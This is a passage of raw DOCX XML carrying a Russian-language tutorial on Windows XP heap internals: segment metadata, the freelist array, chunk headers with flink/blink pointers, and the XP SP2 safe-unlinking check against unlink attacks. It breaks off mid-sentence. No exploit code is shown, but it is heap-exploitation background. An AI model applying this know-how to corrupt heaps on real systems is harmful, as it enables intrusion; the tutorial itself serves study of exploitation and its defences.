      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Ниже представлена подробная таблица с метаданными из структуры сегмента. Для простоты мы установили начальный адрес 0x00480000.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="57" w:after="57"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="57" w:after="57"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Адрес</w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">Значение </w:t>
        <w:tab/>
        <w:t>Описание</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="57" w:after="57"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">0x00480008 </w:t>
        <w:tab/>
        <w:t xml:space="preserve">0xffeeffee </w:t>
        <w:tab/>
        <w:t>Signature</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="57" w:after="57"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">0x0048000C </w:t>
        <w:tab/>
        <w:t xml:space="preserve">0x00000000 </w:t>
        <w:tab/>
        <w:t>Flags</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="57" w:after="57"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">0x00480010 </w:t>
        <w:tab/>
        <w:t xml:space="preserve">0x00480000 </w:t>
        <w:tab/>
        <w:t>Heap</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="57" w:after="57"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">0x00480014 </w:t>
        <w:tab/>
        <w:t xml:space="preserve">0x0003d000 </w:t>
        <w:tab/>
        <w:t>LargeUncommitedRange</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="57" w:after="57"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">0x00480018 </w:t>
        <w:tab/>
        <w:t xml:space="preserve">0x00480000 </w:t>
        <w:tab/>
        <w:t>BaseAddress</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="57" w:after="57"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">0x0048001c </w:t>
        <w:tab/>
        <w:t xml:space="preserve">0x00000040 </w:t>
        <w:tab/>
        <w:t>NumberOfPages</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="57" w:after="57"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">0x00480020 </w:t>
        <w:tab/>
        <w:t xml:space="preserve">0x00480680 </w:t>
        <w:tab/>
        <w:t>FirstEntry</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="57" w:after="57"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">0x00480024 </w:t>
        <w:tab/>
        <w:t xml:space="preserve">0x004c0000 </w:t>
        <w:tab/>
        <w:t>LastValidEntry</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="57" w:after="57"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">0x00480028 </w:t>
        <w:tab/>
        <w:t xml:space="preserve">0x0000003d </w:t>
        <w:tab/>
        <w:t>NumberOfUncommitedPages</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="57" w:after="57"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">0x0048002c </w:t>
        <w:tab/>
        <w:t xml:space="preserve">0x00000001 </w:t>
        <w:tab/>
        <w:t>NumberOfUncommitedRanges</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="57" w:after="57"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">0x00480030 </w:t>
        <w:tab/>
        <w:t xml:space="preserve">0x00480588 </w:t>
        <w:tab/>
        <w:t>UnCommitedRanges</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="57" w:after="57"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">0x00480034 </w:t>
        <w:tab/>
        <w:t xml:space="preserve">0x00000000 </w:t>
        <w:tab/>
        <w:t>AllocatorBackTraceIndex</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="57" w:after="57"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">0x00480036 </w:t>
        <w:tab/>
        <w:t xml:space="preserve">0x00000000 </w:t>
        <w:tab/>
        <w:t>Reserved</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="57" w:after="57"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">0x00480038 </w:t>
        <w:tab/>
        <w:t xml:space="preserve">0x00381eb8 </w:t>
        <w:tab/>
        <w:t>LastEntryInSegment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Важной частью сегмент</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>а</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> является первый чанк. Он содержит в себе данные, которые сами по себе позволяют "перемещаться" по сегменту, поскольку по ним можно просчитать, где наход</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>я</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>тся следующи</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>е</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> чанк</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>и</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">, зная размер </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>каждого из них</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Бэкэнд аллокатор - freelist</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">По смещению 0x178 в структуре кучи находится массив </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">reelist[]. Он содержит двусвязный список чанков. Двусвязность достигается </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Source Han Sans CN" w:cs="FreeSans"/>
          <w:color w:val="auto"/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>с помощью</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> указателей flink и blink.</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438525" cy="200977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38525" cy="2009775"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Диаграмма выше показывает, что freelist содержит чанки от 0 до 128. Любой размер чанка между 0 и 1016 байтам (максимальный размер равен 1024, мин</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>у</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>с 8 байт на метаданные) занимает [размер] * 8 байт. К примеру, у меня есть чанк размером 40 байт. Тогда он будет иметь в массиве индекс 4 (40 / 8).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Если размер превышает 1016 (127 * 8) байта, тогда он будется храниться во freelist[0] в порядке возрастания. Ни</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>же</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">изображена </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Source Han Sans CN" w:cs="FreeSans"/>
          <w:color w:val="auto"/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">структура </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>чанка во freelist:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9972" w:type="dxa"/>
        <w:jc w:val="left"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="55" w:type="dxa"/>
          <w:left w:w="55" w:type="dxa"/>
          <w:bottom w:w="55" w:type="dxa"/>
          <w:right w:w="55" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1424"/>
        <w:gridCol w:w="1425"/>
        <w:gridCol w:w="1560"/>
        <w:gridCol w:w="1289"/>
        <w:gridCol w:w="1317"/>
        <w:gridCol w:w="1532"/>
        <w:gridCol w:w="1424"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1424" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContent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Заголовки</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1425" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:strike w:val="false"/>
                <w:dstrike w:val="false"/>
                <w:outline w:val="false"/>
                <w:shadow w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve">Размер </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Source Han Sans CN" w:cs="FreeSans"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:strike w:val="false"/>
                <w:dstrike w:val="false"/>
                <w:outline w:val="false"/>
                <w:shadow w:val="false"/>
                <w:color w:val="000000"/>
                <w:kern w:val="2"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="none"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
              </w:rPr>
              <w:t xml:space="preserve">текушего </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:strike w:val="false"/>
                <w:dstrike w:val="false"/>
                <w:outline w:val="false"/>
                <w:shadow w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t>(0</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Source Han Sans CN" w:cs="FreeSans"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:strike w:val="false"/>
                <w:dstrike w:val="false"/>
                <w:outline w:val="false"/>
                <w:shadow w:val="false"/>
                <w:color w:val="000000"/>
                <w:kern w:val="2"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="none"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
              </w:rPr>
              <w:t>x</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:strike w:val="false"/>
                <w:dstrike w:val="false"/>
                <w:outline w:val="false"/>
                <w:shadow w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t>2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1560" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom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Размер предыдущего (0x2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1289" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom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Индекс сегмента (0x1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1317" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom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Флаг (0x1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1532" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:strike w:val="false"/>
                <w:dstrike w:val="false"/>
                <w:outline w:val="false"/>
                <w:shadow w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t>Не используется (0x1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1424"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jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:strike w:val="false"/>
                <w:dstrike w:val="false"/>
                <w:outline w:val="false"/>
                <w:shadow w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t>Индекс тега (0x1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1424" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContent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flink/blink</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2985" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom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flink (0x4) </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5562" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>blink (0x4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1424" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContent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Данные</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8547" w:type="dxa"/>
            <w:gridSpan w:val="6"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right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pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Microsoft добавила некоторые ограничения, чтобы защититься от </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">атак </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Source Han Sans CN" w:cs="FreeSans"/>
          <w:color w:val="auto"/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>разрывающих связи в списке</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">(unlink-атак) </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>в структурах freelist. Ниже представлен их короткий список.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Безопасный разрыв связи во freelist:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Этот защитный механизм был реализован в XP SP2 и выше. В сущности он не позволяет провести атаку, описанную в первой части "Переполнения буфера кучи". Он проверяет, что flink предыдущего чанка и blink следующего чанка указава</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ют</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> на текущий аллоцированный чанк. Ниже описание и демонстрация механизма.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:val="clear" w:fill="EEEEEE"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Source Han Sans CN" w:cs="FreeSans"/>
          <w:color w:val="auto"/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">reelist chunk 1[flink] == </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Source Han Sans CN" w:cs="FreeSans"/>
          <w:color w:val="auto"/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">reelist chunk 2 &amp;&amp; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Source Han Sans CN" w:cs="FreeSans"/>
          <w:color w:val="auto"/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">reelist chunk 3[blink] == </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Source Han Sans CN" w:cs="FreeSans"/>
          <w:color w:val="auto"/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>reelist chunk 2</w:t>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18530" cy="412686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18530" cy="4126865"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Source Han Sans CN" w:cs="FreeSans"/>
          <w:color w:val="auto"/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>Система защиты</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> проверяет указатели, помеченные красным</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3817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381760"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Если как</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ая</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
